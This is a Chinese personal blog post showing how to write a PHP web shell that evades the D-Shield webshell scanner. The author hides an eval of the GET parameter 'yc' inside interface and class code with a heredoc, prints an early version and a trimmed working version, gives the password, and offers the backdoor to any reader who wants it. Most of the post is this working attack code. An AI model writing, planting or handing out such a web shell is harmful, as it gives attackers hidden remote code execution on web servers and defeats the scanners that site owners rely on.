php免杀D盾小马
首页 > 学习    作者:Iamyc   2019年12月17日 22:05 星期二   热度:631°   百度已收录  
时间:2019-12-17 22:05   热度:631° 

总的来说,还是觉得自己菜!!!哈哈哈。。。

ok,闲话少说,自己做下免杀小马,也方便自己,同时提高下技能。

下了个最新版的D盾,测试版v2.1.5.4php小马的话,吐司论坛里见的也很多,绕d盾倒是很简单,用类class封装下就能过。

免杀的思路倒是形形色色,千奇百怪的,有类封装的、反序列化的。

所以,我在想,以前写代码的时候,面向对象的三大属性:封装、继承、多态。

ok,不管你们信不信,我当时反正就是奔着多态免杀去的。当然,最后瞎改瞎调的,也不知道成啥样了。

这是最初免杀的样子:

<?PHP

$name="runoob";
interface IEat {
 function eatFish();
 function eatMoss();
}
class yc{
	public function __construct(){
		$args_num = func_num_args();
		echo $args_num;
		if($args_num==2){
      eval(func_get_arg(0));
    }
		$b=$a;
		eval($b);
	}
}

class Whale implements IEat {
 public function eatFish() {
  echo "Whale eats fish.\n";
 }
 public function eatMoss() {
  echo "Whale doesn't eat fish\n";
 }
}

class Carp implements IEat {
 public function eatFish() {
  echo "Carp doesn't eat moss.\n";
 }
 public function eatMoss() {
  echo "Carp eats moss.\n";
	
$a= <<<EOF
$_GET[1]
EOF;
	echo "carp not eats moss.\n";
	$te = new Whale();
	$yc = new yc($a,$a);
	$yc->test();
	$m="a";
	echo $a;
	//$yc->test($a,$a)
 }
}function func(){

$whale = new Whale();
$whale->eatFish();
$whale->eatMoss();
$carp = new Carp();
$carp->eatFish();
$carp->eatMoss();
}

preg_replace("/test/e",func(),"i am test");

代码可能有点乱,但是d盾还是免杀了:最后修改精简下:

<?PHP
interface IEat {
 function eatMoss();
}
class yc{
	public function __construct(){
		$args_num = func_num_args();
		echo $args_num;
		if($args_num==2){
      eval(func_get_arg(0));
    }
		$b=$a;
		eval($b);
	}
}

class Carp implements IEat {
 public function eatMoss() {
  echo "Carp eats moss.\n";
$a= <<<EOF
$_GET[yc]
EOF;
	$yc = new yc($a,$a);
 }
}

function func(){
$carp = new Carp();
$carp->eatMoss();
}

preg_replace("/test/e",func(),"i am test");

密码yc,放到阿里云好像也没提示,就不去试了,需要的自己拿


二维码加载中...
本文作者:Iamyc      文章标题: php免杀D盾小马
本文地址:http://lang-v.com/first_cms/yc/emlog/src/?post=120
版权声明:若无注明,本文皆为“YC's Blog”原创,转载请保留文章出处。

返回顶部    首页    手机版本    后花园  
版权所有:YC's Blog    站长: Iamyc    程序:emlog